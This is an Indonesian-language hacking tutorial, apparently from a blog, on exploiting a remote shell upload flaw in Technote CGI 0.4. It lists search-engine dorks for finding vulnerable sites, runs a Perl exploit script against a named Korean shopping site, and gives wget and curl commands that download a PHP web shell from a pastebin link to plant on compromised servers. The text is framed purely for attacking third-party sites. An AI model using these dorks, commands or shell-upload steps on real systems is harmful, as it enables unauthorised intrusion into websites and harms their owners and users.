 |
Technote CGI Exploit 0.4 Remote Shell Upload Vulnerability
Sebelum masuk ke tutorialnya kalian siapkan tools nya dulu Disini (simpan dengan extensi : .pl)
Kemudian kalian dorking mau di google,yandex,bing,atau apa pun terserah.
inurl:/cgi-bin/technote/
inurl:".cgi?board=FREE_BOARD"
intext:"TECHNOTE-TOP"
inurl:main/main.cgi?board=
(Kembangin lagi)
Xploit? Gk usah kita tinggal pilih webnya kemudian buka terminal,jalankan toolnya seperti berikut
$ pkg install wget
$ pkg install curl
$ pkg install perl
$ perl o.pl http://www.bupyongshopping.co.kr/board/main.cgi?
"Vuln"
Kalo kek gitu berarti vuln,tapi gk smua kek gitu bisa upload shell yaa
Upload shell
$ wget https://pastebin.com/raw/ECstNap8 -O shell.php
atau
$ curl -o shell.php https://pastebin.com/raw/ECstNap8
Cara aksesnya gimana?"tuhh dibawahnya ada path".
Ok gw rasa segitu ajh mwehehe thanks dah visit.
0 Comments